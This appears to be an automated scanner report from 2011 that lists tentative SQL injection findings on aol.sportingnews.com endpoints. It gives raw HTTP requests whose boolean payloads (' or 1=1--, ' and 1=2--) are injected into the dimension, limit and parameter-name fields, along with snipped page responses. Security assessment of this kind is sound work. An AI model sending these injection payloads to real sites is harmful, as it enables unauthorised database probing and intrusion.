Cache-Control: max-age=30
Date: Thu, 05 May 2011 01:12:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105496

<!DOCTYPE html>

<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html class="n
...[SNIP]...
<h2>SPORTING NEWS FAN SHOP</h2>
<span><a href="http://www.fanatics.com/partnerid/9938/" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Fan Shop | unit: homepage mast');" target="_blank">Get your favorite team gear</a></span>
</div>
<!-- breaking news -->
<a href="http://aol.sportingnews.com" class="sn-feed-logo">
<img src="http://st.snimg.com/image/feed/logos/logo_spnews_launch.png" alt="Sporting News Feed Logo">
</a>
<script>
$('form#header-search div.search-icon, form#footer-search div.search-icon').live('click', function(){
$(this).parent().parent().submit();
}).live('mouseover mouseout', function(event){
if (event.type == 'mouseover') {
$(this).addClass('on');
} else {
$(this).removeClass('on');
}
});
</script>
<!-- search -->
<div class="search rounded-corners clearfix">
<form id="header-search" method="get" action="/search">
<fieldset>
<label for="search-box">Find on SN</label>
<input id="search-box" name="search_term" type="text">
<div class="search-icon">Search</div>
</fieldset>
</form>
<div class="follow">
<span class="text">Follow SN</span>
<span class="facebook">
<a target="_blank" title="Sporting News Facebook Page" href="http://www.facebook.com/sportingnews">
Facebook
</a>
</span>
<span class="twitter">
<a target="_blank" title="Sporting News' Twitter Page" target="_blank" href="http://twitter.com/SportingNews">
Twitter
</a>
</span>
</div>
<div class="connect">
<span class="text">Connect with SN</span>
<span class="facebook-connect">
<fb:login-button show-faces="false" max-rows="1" width="80" auto
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:12:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105521

<!DOCTYPE html>

<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html class="n
...[SNIP]...
<h2>FANTASY SOURCE BASEBALL</h2>
<span><a href="http://fantasysource.sportingnews.com/baseball/promo?affiliate_code=sn_home" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball - FREE Trial | unit: homepage mast');">Try it for FREE</a></span>
</div>
<!-- breaking news -->
<a href="http://aol.sportingnews.com" class="sn-feed-logo">
<img src="http://st.snimg.com/image/feed/logos/logo_spnews_launch.png" alt="Sporting News Feed Logo">
</a>
<script>
$('form#header-search div.search-icon, form#footer-search div.search-icon').live('click', function(){
$(this).parent().parent().submit();
}).live('mouseover mouseout', function(event){
if (event.type == 'mouseover') {
$(this).addClass('on');
} else {
$(this).removeClass('on');
}
});
</script>
<!-- search -->
<div class="search rounded-corners clearfix">
<form id="header-search" method="get" action="/search">
<fieldset>
<label for="search-box">Find on SN</label>
<input id="search-box" name="search_term" type="text">
<div class="search-icon">Search</div>
</fieldset>
</form>
<div class="follow">
<span class="text">Follow SN</span>
<span class="facebook">
<a target="_blank" title="Sporting News Facebook Page" href="http://www.facebook.com/sportingnews">
Facebook
</a>
</span>
<span class="twitter">
<a target="_blank" title="Sporting News' Twitter Page" target="_blank" href="http://twitter.com/SportingNews">
Twitter
</a>
</span>
</div>
<div class="connect">
<span class="text">Connect with SN</span>
<span class="facebook-connect">
<fb:login-button show-faces="false" max
...[SNIP]...

1.2. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The dimension parameter appears to be vulnerable to SQL injection attacks. The payloads 29246186'%20or%201%3d1--%20 and 29246186'%20or%201%3d2--%20 were each submitted in the dimension parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15029246186'%20or%201%3d1--%20&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:15:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:16:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4594

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
e:11px; color:#000; }
#fs { display:block; width:180px; height:15029246186' or 1=1-- px; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15029246186' or 1=1-- .jpg) no-repeat; }
#fs a, #fs a:visited { color:#004a85; font-weight:bold; text-decoration:none; }
#fs a:hover { color:#000; }
#fs h1 { font-size:17px; font-weight:bold; text-align:center; margin:9px 0; }
#fs table { border-collapse:collapse; border-bottom:1px solid #000; }
#fs th, #fs td { text-align:left; }
#fs th { border-bottom:1px solid #000; padding:0 7px 4px; }
#fs td { padding:4px 7px; border-left:1px solid #000; }
#fs td.rank { width:25px; border:none; text-align:center; }
#fs .more-link { text-align:right; margin:9px 11px 0 0; }
#fs .more-link a { font-size:12px; font-style:italic; font-weight:normal; }
#fs a.fs-logo { display:block; position:absolute; }
#fs.ad-300x250 table { width:280px; margin:0 10px; }
#fs.ad-300x250 a.fs-logo { width:300px; height:70px; top:180px; }
#fs.ad-728x90 h1 { width:220px; float:left; margin:12px 0 0 60px; line-height:1.2em; }
#fs.ad-728x90 h1, #fs.ad-728x90 .more-link a, #fs.ad-728x90 .more-link a:visited { color:#fff; }
#fs.ad-728x90 .more-link { width:220px; position:absolute; top:64px; left:60px; margin:0; text-align:center; }
#fs.ad-728x90 table { position:absolute; width:260px; top:7px; left:275px; }
#fs.ad-728x90 a.fs-logo { width:188px; height:90px; top:0; left:540px; }
#fs.ad-180x150 h1 { font-size:10px; margin:6px 0 2px; }
#fs.ad-180x150 table { width:172px; margin:0 4px; }
#fs.ad-180x150 th { padding:0 3px 3px; }
#fs.ad-180x150 td { padding:3px; }
#fs.ad-180x150 td.rank { width:5px; }
#fs.ad-180x150 .more-link { margin:4px 5px 0 0; }
#fs.ad-180x150 .more-link a { font-size:10px; }
#fs.ad-180x150 a.fs-logo { width:180px; height:45px; top:105px; }
</style>
<div id="fs" class="ad-180x15029246186' or 1=1-- ">
<h1>Fantasy Baseball 3B Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnew
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15029246186'%20or%201%3d2--%20&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:15:00 GMT
Cache-Control: max-age=280
Date: Thu, 05 May 2011 01:16:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4605

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
e:11px; color:#000; }
#fs { display:block; width:180px; height:15029246186' or 1=2-- px; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15029246186' or 1=2-- .jpg) no-repeat; }
#fs a, #fs a:visited { color:#004a85; font-weight:bold; text-decoration:none; }
#fs a:hover { color:#000; }
#fs h1 { font-size:17px; font-weight:bold; text-align:center; margin:9px 0; }
#fs table { border-collapse:collapse; border-bottom:1px solid #000; }
#fs th, #fs td { text-align:left; }
#fs th { border-bottom:1px solid #000; padding:0 7px 4px; }
#fs td { padding:4px 7px; border-left:1px solid #000; }
#fs td.rank { width:25px; border:none; text-align:center; }
#fs .more-link { text-align:right; margin:9px 11px 0 0; }
#fs .more-link a { font-size:12px; font-style:italic; font-weight:normal; }
#fs a.fs-logo { display:block; position:absolute; }
#fs.ad-300x250 table { width:280px; margin:0 10px; }
#fs.ad-300x250 a.fs-logo { width:300px; height:70px; top:180px; }
#fs.ad-728x90 h1 { width:220px; float:left; margin:12px 0 0 60px; line-height:1.2em; }
#fs.ad-728x90 h1, #fs.ad-728x90 .more-link a, #fs.ad-728x90 .more-link a:visited { color:#fff; }
#fs.ad-728x90 .more-link { width:220px; position:absolute; top:64px; left:60px; margin:0; text-align:center; }
#fs.ad-728x90 table { position:absolute; width:260px; top:7px; left:275px; }
#fs.ad-728x90 a.fs-logo { width:188px; height:90px; top:0; left:540px; }
#fs.ad-180x150 h1 { font-size:10px; margin:6px 0 2px; }
#fs.ad-180x150 table { width:172px; margin:0 4px; }
#fs.ad-180x150 th { padding:0 3px 3px; }
#fs.ad-180x150 td { padding:3px; }
#fs.ad-180x150 td.rank { width:5px; }
#fs.ad-180x150 .more-link { margin:4px 5px 0 0; }
#fs.ad-180x150 .more-link a { font-size:10px; }
#fs.ad-180x150 a.fs-logo { width:180px; height:45px; top:105px; }
</style>
<div id="fs" class="ad-180x15029246186' or 1=2-- ">
<h1>Fantasy Baseball Overall Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sporti
...[SNIP]...

1.3. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [limit parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The limit parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the limit parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&limit=3'%20and%201%3d1--%20 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4376

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<a href="http://fantasysource.sportingnews.com/baseball/player/7172/dan-haren" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Dan Haren</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/3/los-angeles-angels" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">LAA</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/8180/clayton-kershaw" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Clayton Kershaw</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/19/los-angeles-dodgers" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">LAD</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7790/jon-lester" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Jon Lester</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
</table>
<div class="more-link"><a href="http://fantasysource.sportingnews.com/baseball/rankings?pagetype=SP" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | see full');">See Full Top SP Rankings</a></div>
<a href="http://fantasysource.sportingnews.com/baseball/home" class="fs-logo" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | logo');"></a>
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&limit=3'%20and%201%3d2--%20 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4386

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<a href="http://fantasysource.sportingnews.com/baseball/player/5737/vladimir-guerrero" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Vladimir Guerrero</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/1/baltimore-orioles" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bal</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5909/david-ortiz" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">David Ortiz</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6980/travis-hafner" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Travis Hafner</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/5/cleveland-indians" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cle</a></td>
</tr>
</table>
<div class="more-link"><a href="http://fantasysource.sportingnews.com/baseball/rankings?pagetype=DH" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | see full');">See Full Top DH Rankings</a></div>
<a href="http://fantasysource.sportingnews.com/baseball/home" class="fs-logo" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | log
...[SNIP]...

1.4. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 87821652%20or%201%3d1--%20 and 87821652%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&lim/187821652%20or%201%3d1--%20it=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5497

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<h1>Fantasy Baseball DH Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5737/vladimir-guerrero" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Vladimir Guerrero</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/1/baltimore-orioles" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bal</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5909/david-ortiz" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">David Ortiz</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6980/travis-hafner" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Travis Hafner</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/5/cleveland-indians" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cle</a></td>
</tr>
<tr class="alt">
<td class="rank">4</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/playe
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&lim/187821652%20or%201%3d2--%20it=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5513

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<h1>Fantasy Baseball Overall Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6619/albert-pujols" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Albert Pujols</a></td>
<td>1B</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/24/st-louis-cardinals" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">StL</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7488/hanley-ramirez" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Hanley Ramirez</a></td>
<td>SS</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/28/florida-marlins" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Fla</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7946/joey-votto" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Joey Votto</a></td>
<td>1B</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/17/cincinnati-reds" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cin</a></td>
</tr>
<tr class="alt">
<td class="rank">4</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/playe
...[SNIP]...

1.5. http://aol.sportingnews.com/services/sn-promos/yearbooks.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/sn-promos/yearbooks.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13762307%20or%201%3d1--%20 and 13762307%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/sn-promos/yearbooks.php?113762307%20or%201%3d1--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=295
Date: Thu, 05 May 2011 01:31:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1331

